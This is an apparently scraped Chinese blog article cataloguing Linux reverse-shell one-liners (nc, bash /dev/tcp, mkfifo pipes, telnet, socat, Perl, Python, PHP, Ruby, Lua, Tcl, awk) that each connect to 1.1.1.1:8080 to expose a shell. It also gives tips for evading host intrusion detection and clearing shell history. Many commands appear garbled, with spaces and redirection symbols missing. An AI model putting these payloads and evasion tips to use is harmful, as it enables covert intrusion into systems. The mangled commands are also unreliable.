Linux下内网反弹的方法是什么(linux,开发技术)

时间:2024-05-03 10:36:01 作者 : 石家庄SEO 分类 : 开发技术
  • TAG :
Linux下内网反弹的方法是什么

反弹技巧总结:

1、NC反弹

Nc1.1.1.18080-e/bin/bash

2、Bash-socket反弹

/bin/bash-i>/dev/tcp/1.1.1.1/80800&1

3、Shell-socket反弹

a)exec2>&0;0exec196/dev/tcp/1.1.1.1/8080;sh&1962>&196b)exec5/dev/tcp/1.1.1.1/8080catwhilereadline;do$line2>&5>&5;done[分两句执行]

4、文件管道-nc/telnet反弹

a)rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc1.1.1.18080>/tmp/fb)rm/tmp/backpipe;mknod/tmp/backpipep;/bin/bash0/backpipe|nc1.1.1.180801>/tmp/backpipec)rm/tmp/backpipe;mknod/tmp/backpipep&&telnet1.1.1.180800/backpipe|/bin/bash1>/tmp/backpipe

5、Bash-telnet反弹

telnet1.1.1.18080|/bin/bash|telnet1.1.1.19090[另一个端口]

6、Socat反弹

socattcp-connect:1.1.1.1:8080exec:"bash-li",pty,stderr,setsid,sigint,sane

7、脚本反弹

a)Perl反弹1)perl-e'useSocket;$i="1.1.1.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'2)perl-MIO-e'$p=fork;exit,if($p);$c=newIO::Socket::INET(PeerAddr,"1.1.1.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_while;'b)Python反弹python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'c)PHP反弹php-r'$sock=fsockopen("1.1.1.1",8080);exec("/bin/sh-i&32>&3");'d)ruby反弹ruby-rsocket-e'f=TCPSocket.open("1.1.1.1",8080).to_i;execsprintf("/bin/sh-i&%d2>&%d",f,f,f)'2)ruby-rsocket-e'exitiffork;c=TCPSocket.new("1.1.1.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'e)lua反弹lua-e"require('socket');require('os');t=socket.tcp();t:connect('1.1.1.1','8080');os.execute('/bin/sh-i&32>&3');"f)tcl反弹echo'sets[socket1.1.1.18080];while42{puts-nonewline$s"shell>";flush$s;gets$sc;sete"exec$c";if{![catch{setr[eval$e]}err]}{puts$s$r};flush$s;};close$s;'|tclshg)awk反弹awk'BEGIN{s="/inet/tcp/0/1.1.1.1/8080";while(42){do{printf"shell>"|&s;s|&getlinec;if(c){while((c|&getline)>0)print$0|&s;close(c);}}while(c!="exit")close(s);}}'/dev/null

8、二进制程序反弹

Socket程序+命令执行,详见metasploit。

杂谈

市面上反弹shell的脚本和程序非常多,拿metasploit来说,可以生产上百种shell,但解码以后无非以上几种,有趣的时候metasploit生成的无论是脚本反弹程序还是二进制反弹程序多数都是自己实现了system_call,而不是调用系统bash或命令之类,看来做的还是很良心的。

值得一提的是,由于大型甲方公司都会有HIDS防护,目前已知的HIDS,要么修改了bash,要么劫持glibc,要么修改系统底层(这种可能性较低,出问题的几率大)。

当你觉得可以反弹shell的时候一定要提前识别好环境,不然执行了一个bash –i 或nc ,很有可能直接被hids一波带走。

比较推荐使用shell内置反弹或脚本类的反弹shell程序,一般的hids不会记录,非常不建议调用系统bash命令产生反弹,起码.bash_history会妥妥把你出卖掉。

内网shell反弹无论在渗透还是在反渗透中都是一个绕过不开的话题,关于反弹shell,其中有几个有趣的问题:

\1. 反弹shell的理解:

内网shell反弹的本质是与公网服务器建立连接,并能将公网服务器传输过来的命令执行,并将结果返回,因此反弹shell涉及两个过程网络建立+命令执行,这两个过程都是衡量反弹功能的标准,网络建立要求复杂加密(如msf: meterpreter_reverse_https等),命令执行则要求尽可能绕开hids和相关记录。

2.交互式shell:

交互式shell是shell最常见的一种,交互式shell区别非交互式shell最大的就是加载了环境变量,交互式shell的使用和在终端terminal中几乎一致。一般来说,远程命令执行反弹出来仅仅是实现了一个非交互式shell。从非交互式shell升级到交互式shell,一个最简单的方式就是用python脚本 pty.spawn(“/bin/bash”)

\3. 交互式shell在实际渗透过程中未必比非交互式shell好,因为有经验的甲方都会对环境变量、shell终端加载文件如.bashrc、bash_profile等进行安全处理,直接提升到交互式shell,触发HIDS告警的可能性较高(当然并非绝对)。

(Ps:如果你使用别人的工具,反弹了shell,却不清楚是不是交互式shell,一个简单的方法就是执行history和set命令,如果都有正常返回,那你就要当心了,你可能获取了一个交互式shell,尽快清除history吧。)

 </div> <div class="zixun-tj-product adv-bottom"></div> </div> </div> <div class="prve-next-news">
本文:Linux下内网反弹的方法是什么的详细内容,希望对您有所帮助,信息来源于网络。
上一篇:Java Integer怎么获取第一位和最后一位并进行截取下一篇:

5 人围观 / 0 条评论 ↓快速评论↓

(必须)

(必须,保密)

阿狸1 阿狸2 阿狸3 阿狸4 阿狸5 阿狸6 阿狸7 阿狸8 阿狸9 阿狸10 阿狸11 阿狸12 阿狸13 阿狸14 阿狸15 阿狸16 阿狸17 阿狸18